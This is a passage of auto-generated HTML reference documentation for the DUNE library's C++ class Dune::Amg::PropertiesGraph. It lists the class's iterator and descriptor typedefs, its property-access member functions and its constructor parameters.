class="typebreak"/> <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>, VM, EM &gt; &gt;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a39d89142505784b2c0b19a879307b7a3">ConstEdgeIterator</a></td></tr> <tr class="memdesc:a39d89142505784b2c0b19a879307b7a3"><td class="mdescLeft">&#160;</td><td class="mdescRight">The type of the constant edge iterator. <a href="#a39d89142505784b2c0b19a879307b7a3"></a><br/></td></tr> <tr class="memitem:a440ff33400310293b351b4172356d411"><td class="memItemLeft" align="right" valign="top">typedef <a class="el" href="a00291.html">VertexIteratorT</a><br class="typebreak"/> &lt; <a class="el" href="a00205.html">PropertiesGraph</a>&lt; <a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>, <br class="typebreak"/> <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>, <br class="typebreak"/> <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>, VM, EM &gt; &gt;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a440ff33400310293b351b4172356d411">VertexIterator</a></td></tr> <tr class="memdesc:a440ff33400310293b351b4172356d411"><td class="mdescLeft">&#160;</td><td class="mdescRight">The type of the mutable Vertex iterator. <a href="#a440ff33400310293b351b4172356d411"></a><br/></td></tr> <tr class="memitem:a9bacf6679d481b3550c61128b716087d"><td class="memItemLeft" align="right" valign="top">typedef <a class="el" href="a00291.html">VertexIteratorT</a>&lt; const <br class="typebreak"/> <a class="el" href="a00205.html">PropertiesGraph</a>&lt; <a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>, <br class="typebreak"/> <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>, <br class="typebreak"/> <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>, VM, EM &gt; &gt;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a9bacf6679d481b3550c61128b716087d">ConstVertexIterator</a></td></tr> <tr class="memdesc:a9bacf6679d481b3550c61128b716087d"><td class="mdescLeft">&#160;</td><td class="mdescRight">The type of the constant Vertex iterator. <a href="#a9bacf6679d481b3550c61128b716087d"></a><br/></td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2><a name="pub-methods"></a> Public Member Functions</h2></td></tr> <tr class="memitem:a3aabed15e52736a3db43b61b37457df7"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a1ce0f1eaa14e3c256b2591bac899f4db">EdgeIterator</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a3aabed15e52736a3db43b61b37457df7">beginEdges</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;source)</td></tr> <tr class="memdesc:a3aabed15e52736a3db43b61b37457df7"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the mutable edge iterator over edges starting at a vertex. <a href="#a3aabed15e52736a3db43b61b37457df7"></a><br/></td></tr> <tr class="memitem:a5d1975f07023660d6983d37e2b318121"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a1ce0f1eaa14e3c256b2591bac899f4db">EdgeIterator</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a5d1975f07023660d6983d37e2b318121">endEdges</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;source)</td></tr> <tr class="memdesc:a5d1975f07023660d6983d37e2b318121"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the mutable edge iterator over edges starting at a vertex. <a href="#a5d1975f07023660d6983d37e2b318121"></a><br/></td></tr> <tr class="memitem:a69defec024b44484d96373cfbaf8a44f"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a39d89142505784b2c0b19a879307b7a3">ConstEdgeIterator</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a69defec024b44484d96373cfbaf8a44f">beginEdges</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;source) const </td></tr> <tr class="memdesc:a69defec024b44484d96373cfbaf8a44f"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the mutable edge iterator over edges starting at a vertex. <a href="#a69defec024b44484d96373cfbaf8a44f"></a><br/></td></tr> <tr class="memitem:a9e9557fc3cda72c1bddb3e579eaa966a"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a39d89142505784b2c0b19a879307b7a3">ConstEdgeIterator</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a9e9557fc3cda72c1bddb3e579eaa966a">endEdges</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;source) const </td></tr> <tr class="memdesc:a9e9557fc3cda72c1bddb3e579eaa966a"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the mutable edge iterator over edges starting at a vertex. <a href="#a9e9557fc3cda72c1bddb3e579eaa966a"></a><br/></td></tr> <tr class="memitem:a9b940011fec22f807ee73158a9f3be69"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a440ff33400310293b351b4172356d411">VertexIterator</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a9b940011fec22f807ee73158a9f3be69">begin</a> ()</td></tr> <tr class="memdesc:a9b940011fec22f807ee73158a9f3be69"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get an iterator over the vertices. <a href="#a9b940011fec22f807ee73158a9f3be69"></a><br/></td></tr> <tr class="memitem:a15a79fe73b50a6c89aff4ad878380e2a"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a440ff33400310293b351b4172356d411">VertexIterator</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a15a79fe73b50a6c89aff4ad878380e2a">end</a> ()</td></tr> <tr class="memdesc:a15a79fe73b50a6c89aff4ad878380e2a"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get an iterator over the vertices. <a href="#a15a79fe73b50a6c89aff4ad878380e2a"></a><br/></td></tr> <tr class="memitem:a8512cd6e027ab17cb01bf1b2069bfd44"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a9bacf6679d481b3550c61128b716087d">ConstVertexIterator</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a8512cd6e027ab17cb01bf1b2069bfd44">begin</a> () const </td></tr> <tr class="memdesc:a8512cd6e027ab17cb01bf1b2069bfd44"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get an iterator over the vertices. <a href="#a8512cd6e027ab17cb01bf1b2069bfd44"></a><br/></td></tr> <tr class="memitem:a3ae871750d0ef4be146ab7b6bb8aef47"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a9bacf6679d481b3550c61128b716087d">ConstVertexIterator</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a3ae871750d0ef4be146ab7b6bb8aef47">end</a> () const </td></tr> <tr class="memdesc:a3ae871750d0ef4be146ab7b6bb8aef47"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get an iterator over the vertices. <a href="#a3ae871750d0ef4be146ab7b6bb8aef47"></a><br/></td></tr> <tr class="memitem:ac7254be6511972118cfcb380377e2ed5"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#ac7254be6511972118cfcb380377e2ed5">getVertexProperties</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;vertex)</td></tr> <tr class="memdesc:ac7254be6511972118cfcb380377e2ed5"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the properties associated with a vertex. <a href="#ac7254be6511972118cfcb380377e2ed5"></a><br/></td></tr> <tr class="memitem:a6fa831c8ff39965efc4e05a762621b0d"><td class="memItemLeft" align="right" valign="top">const <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a6fa831c8ff39965efc4e05a762621b0d">getVertexProperties</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;vertex) const </td></tr> <tr class="memdesc:a6fa831c8ff39965efc4e05a762621b0d"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the properties associated with a vertex. <a href="#a6fa831c8ff39965efc4e05a762621b0d"></a><br/></td></tr> <tr class="memitem:a48a8f8cb772902fed871a78feac25204"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#a1e87b1382ebbf1cab6a77fc3cb3849c6">EdgeDescriptor</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a48a8f8cb772902fed871a78feac25204">findEdge</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;source, const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;target)</td></tr> <tr class="memdesc:a48a8f8cb772902fed871a78feac25204"><td class="mdescLeft">&#160;</td><td class="mdescRight">Find the descriptor of an edge. <a href="#a48a8f8cb772902fed871a78feac25204"></a><br/></td></tr> <tr class="memitem:ab5f77ab35caef7e63a8c4444621ea929"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#ab5f77ab35caef7e63a8c4444621ea929">getEdgeProperties</a> (const <a class="el" href="a00205.html#a1e87b1382ebbf1cab6a77fc3cb3849c6">EdgeDescriptor</a> &amp;edge)</td></tr> <tr class="memdesc:ab5f77ab35caef7e63a8c4444621ea929"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the properties associated with a edge. <a href="#ab5f77ab35caef7e63a8c4444621ea929"></a><br/></td></tr> <tr class="memitem:abf5bbf078d6f05c5ed17dc0d929d97e1"><td class="memItemLeft" align="right" valign="top">const <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#abf5bbf078d6f05c5ed17dc0d929d97e1">getEdgeProperties</a> (const <a class="el" href="a00205.html#a1e87b1382ebbf1cab6a77fc3cb3849c6">EdgeDescriptor</a> &amp;edge) const </td></tr> <tr class="memdesc:abf5bbf078d6f05c5ed17dc0d929d97e1"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the properties associated with a edge. <a href="#abf5bbf078d6f05c5ed17dc0d929d97e1"></a><br/></td></tr> <tr class="memitem:aa820797ec2e749b48f448809e818ea62"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#aa820797ec2e749b48f448809e818ea62">getEdgeProperties</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;source, const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;target)</td></tr> <tr class="memdesc:aa820797ec2e749b48f448809e818ea62"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the properties associated with a edge. <a href="#aa820797ec2e749b48f448809e818ea62"></a><br/></td></tr> <tr class="memitem:a8eec13dd8da0a039112ee2ee7cd5cf38"><td class="memItemLeft" align="right" valign="top">const <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a8eec13dd8da0a039112ee2ee7cd5cf38">getEdgeProperties</a> (const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;source, const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;target) const </td></tr> <tr class="memdesc:a8eec13dd8da0a039112ee2ee7cd5cf38"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the properties associated with a edge. <a href="#a8eec13dd8da0a039112ee2ee7cd5cf38"></a><br/></td></tr> <tr class="memitem:a5fc4a922d58efed26ed62b998c4b4331"><td class="memItemLeft" align="right" valign="top">const <a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a> &amp;&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a5fc4a922d58efed26ed62b998c4b4331">graph</a> () const </td></tr> <tr class="memdesc:a5fc4a922d58efed26ed62b998c4b4331"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the graph the properties are attached to. <a href="#a5fc4a922d58efed26ed62b998c4b4331"></a><br/></td></tr> <tr class="memitem:ae33788af99559312f3f5d166382ba9d8"><td class="memItemLeft" align="right" valign="top">std::size_t&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#ae33788af99559312f3f5d166382ba9d8">noVertices</a> () const </td></tr> <tr class="memdesc:ae33788af99559312f3f5d166382ba9d8"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the number of vertices in the graph. <a href="#ae33788af99559312f3f5d166382ba9d8"></a><br/></td></tr> <tr class="memitem:a73afd0dcf2d685539e2989800c2f5fbd"><td class="memItemLeft" align="right" valign="top">std::size_t&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a73afd0dcf2d685539e2989800c2f5fbd">noEdges</a> () const </td></tr> <tr class="memdesc:a73afd0dcf2d685539e2989800c2f5fbd"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the number of edges in the graph. <a href="#a73afd0dcf2d685539e2989800c2f5fbd"></a><br/></td></tr> <tr class="memitem:a691070c63473ad3dda572c26a1660054"><td class="memItemLeft" align="right" valign="top"><a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#a691070c63473ad3dda572c26a1660054">maxVertex</a> () const </td></tr> <tr class="memdesc:a691070c63473ad3dda572c26a1660054"><td class="mdescLeft">&#160;</td><td class="mdescRight">Get the maximal vertex descriptor. <a href="#a691070c63473ad3dda572c26a1660054"></a><br/></td></tr> <tr class="memitem:aeefc7a872cf23aa05a94ef097c0b4343"><td class="memItemLeft" align="right" valign="top">&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="a00205.html#aeefc7a872cf23aa05a94ef097c0b4343">PropertiesGraph</a> (<a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a> &amp;<a class="el" href="a00205.html#a5fc4a922d58efed26ed62b998c4b4331">graph</a>, const <a class="el" href="a00205.html#a965116a5ca037414e1c5ae6ab342b8ad">VertexMap</a> &amp;vmap=<a class="el" href="a00205.html#a965116a5ca037414e1c5ae6ab342b8ad">VertexMap</a>(), const <a class="el" href="a00205.html#a8179cbefa851d6c0094255659e1930a9">EdgeMap</a> &amp;emap=<a class="el" href="a00205.html#a8179cbefa851d6c0094255659e1930a9">EdgeMap</a>())</td></tr> <tr class="memdesc:aeefc7a872cf23aa05a94ef097c0b4343"><td class="mdescLeft">&#160;</td><td class="mdescRight">Constructor. <a href="#aeefc7a872cf23aa05a94ef097c0b4343"></a><br/></td></tr> </table> <hr/><a name="details" id="details"></a><h2>Detailed Description</h2> <div class="textblock"><h3>template&lt;class G, class VP, class EP, class VM = IdentityMap, class EM = IdentityMap&gt;<br/> class Dune::Amg::PropertiesGraph&lt; G, VP, EP, VM, EM &gt;</h3> <p>Attaches properties to the edges and vertices of a graph. </p> </div><hr/><h2>Member Typedef Documentation</h2> <a class="anchor" id="a39d89142505784b2c0b19a879307b7a3"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef <a class="el" href="a00113.html">EdgeIteratorT</a>&lt;const <a class="el" href="a00205.html">PropertiesGraph</a>&lt;<a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>, <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>, <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>,VM,EM&gt; &gt; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#a39d89142505784b2c0b19a879307b7a3">ConstEdgeIterator</a></td> </tr> </table> </div><div class="memdoc"> <p>The type of the constant edge iterator. </p> </div> </div> <a class="anchor" id="a9bacf6679d481b3550c61128b716087d"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef <a class="el" href="a00291.html">VertexIteratorT</a>&lt;const <a class="el" href="a00205.html">PropertiesGraph</a>&lt;<a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>, <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>, <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>,VM,EM&gt; &gt; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#a9bacf6679d481b3550c61128b716087d">ConstVertexIterator</a></td> </tr> </table> </div><div class="memdoc"> <p>The type of the constant Vertex iterator. </p> </div> </div> <a class="anchor" id="a1e87b1382ebbf1cab6a77fc3cb3849c6"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef Graph::EdgeDescriptor <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#a1e87b1382ebbf1cab6a77fc3cb3849c6">EdgeDescriptor</a></td> </tr> </table> </div><div class="memdoc"> <p>The edge descritor. </p> </div> </div> <a class="anchor" id="a1ce0f1eaa14e3c256b2591bac899f4db"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef <a class="el" href="a00113.html">EdgeIteratorT</a>&lt;<a class="el" href="a00205.html">PropertiesGraph</a>&lt;<a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>, <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>, <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>,VM,EM&gt; &gt; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#a1ce0f1eaa14e3c256b2591bac899f4db">EdgeIterator</a></td> </tr> </table> </div><div class="memdoc"> <p>The type of the mutable edge iterator. </p> </div> </div> <a class="anchor" id="a8179cbefa851d6c0094255659e1930a9"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef EM <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#a8179cbefa851d6c0094255659e1930a9">EdgeMap</a></td> </tr> </table> </div><div class="memdoc"> <p>The type of the map for converting the EdgeDescriptor to std::size_t. </p> <p>Has to provide the following method: std::size_t operator[](const EdgeDescriptor&amp; vertex)</p> <p>The following condition has to be met: Let e1 and e2 be two edge descriptors, e1 &lt; e2, and map be the index map. Then map[v1]&lt;map[v2] has to hold. </p> </div> </div> <a class="anchor" id="aa8149c0a1d29a2b3c2d7fe2520aecaa2"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef EP <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a></td> </tr> </table> </div><div class="memdoc"> <p>The type of the properties of the edges;. </p> </div> </div> <a class="anchor" id="a6e83e9aa4e797967fa318b86459d0149"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef G <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a></td> </tr> </table> </div><div class="memdoc"> <p>The graph we attach properties to. </p> </div> </div> <a class="anchor" id="acc1d8f22266e986a90c7ff0a380517d8"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef Graph::VertexDescriptor <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a></td> </tr> </table> </div><div class="memdoc"> <p>The vertex descriptor. </p> </div> </div> <a class="anchor" id="a440ff33400310293b351b4172356d411"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef <a class="el" href="a00291.html">VertexIteratorT</a>&lt;<a class="el" href="a00205.html">PropertiesGraph</a>&lt;<a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a>, <a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a>, <a class="el" href="a00205.html#aa8149c0a1d29a2b3c2d7fe2520aecaa2">EdgeProperties</a>,VM,EM&gt; &gt; <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#a440ff33400310293b351b4172356d411">VertexIterator</a></td> </tr> </table> </div><div class="memdoc"> <p>The type of the mutable Vertex iterator. </p> </div> </div> <a class="anchor" id="a965116a5ca037414e1c5ae6ab342b8ad"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef VM <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#a965116a5ca037414e1c5ae6ab342b8ad">VertexMap</a></td> </tr> </table> </div><div class="memdoc"> <p>The type of the map for converting the VertexDescriptor to std::size_t. </p> <p>Has to provide the following method: std::size_t operator[](const VertexDescriptor&amp; vertex)</p> <p>The following condition has to be met: Let v1 and v2 be two vertex descriptors with v1 &lt; v2 and map be the index map. Then map[v1]&lt;map[v2] has to hold. </p> </div> </div> <a class="anchor" id="aa13e4d256759286236ec4ca19ff73e9e"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname">typedef VP <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html#aa13e4d256759286236ec4ca19ff73e9e">VertexProperties</a></td> </tr> </table> </div><div class="memdoc"> <p>The type of the properties of the vertices. </p> </div> </div> <hr/><h2>Constructor &amp; Destructor Documentation</h2> <a class="anchor" id="aeefc7a872cf23aa05a94ef097c0b4343"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::<a class="el" href="a00205.html">PropertiesGraph</a> </td> <td>(</td> <td class="paramtype"><a class="el" href="a00205.html#a6e83e9aa4e797967fa318b86459d0149">Graph</a> &amp;&#160;</td> <td class="paramname"><em>graph</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">const <a class="el" href="a00205.html#a965116a5ca037414e1c5ae6ab342b8ad">VertexMap</a> &amp;&#160;</td> <td class="paramname"><em>vmap</em> = <code><a class="el" href="a00205.html#a965116a5ca037414e1c5ae6ab342b8ad">VertexMap</a>()</code>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">const <a class="el" href="a00205.html#a8179cbefa851d6c0094255659e1930a9">EdgeMap</a> &amp;&#160;</td> <td class="paramname"><em>emap</em> = <code><a class="el" href="a00205.html#a8179cbefa851d6c0094255659e1930a9">EdgeMap</a>()</code>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Constructor. </p> <dl class="params"><dt>Parameters:</dt><dd> <table class="params"> <tr><td class="paramname">graph</td><td>The graph we attach properties to. </td></tr> <tr><td class="paramname">vmap</td><td>The map of the vertices onto indices. </td></tr> <tr><td class="paramname">emap</td><td>The map of the edges onto indices. </td></tr> </table> </dd> </dl> </div> </div> <hr/><h2>Member Function Documentation</h2> <a class="anchor" id="a9b940011fec22f807ee73158a9f3be69"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#a440ff33400310293b351b4172356d411">VertexIterator</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::begin </td> <td>(</td> <td class="paramname"></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Get an iterator over the vertices. </p> <dl class="section return"><dt>Returns:</dt><dd>A vertex Iterator positioned at the first vertex. </dd></dl> </div> </div> <a class="anchor" id="a8512cd6e027ab17cb01bf1b2069bfd44"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#a9bacf6679d481b3550c61128b716087d">ConstVertexIterator</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::begin </td> <td>(</td> <td class="paramname"></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get an iterator over the vertices. </p> <dl class="section return"><dt>Returns:</dt><dd>A vertex Iterator positioned at the first vertex. </dd></dl> </div> </div> <a class="anchor" id="a3aabed15e52736a3db43b61b37457df7"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#a1ce0f1eaa14e3c256b2591bac899f4db">EdgeIterator</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::beginEdges </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>source</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Get the mutable edge iterator over edges starting at a vertex. </p> <dl class="section return"><dt>Returns:</dt><dd>An edge iterator over edges starting at a vertex positioned at the first edge. </dd></dl> </div> </div> <a class="anchor" id="a69defec024b44484d96373cfbaf8a44f"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" href="a00205.html#a39d89142505784b2c0b19a879307b7a3">ConstEdgeIterator</a> <a class="el" href="a00205.html">Dune::Amg::PropertiesGraph</a>&lt; G, VP, EP, VM, EM &gt;::beginEdges </td> <td>(</td> <td class="paramtype">const <a class="el" href="a00205.html#acc1d8f22266e986a90c7ff0a380517d8">VertexDescriptor</a> &amp;&#160;</td> <td class="paramname"><em>source</em></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> <p>Get the mutable edge iterator over edges starting at a vertex. </p> <dl class="section return"><dt>Returns:</dt><dd>An edge iterator over edges starting at a vertex positioned at the first edge. </dd></dl> </div> </div> <a class="anchor" id="a15a79fe73b50a6c89aff4ad878380e2a"></a> <div class="memitem"> <div class="memproto"> <div class="memtemplate"> template&lt;class G , class VP , class EP , class VM = IdentityMap, class EM = IdentityMap&gt; </div> <table class="memname"> <tr> <td class="memname"><a class="el" 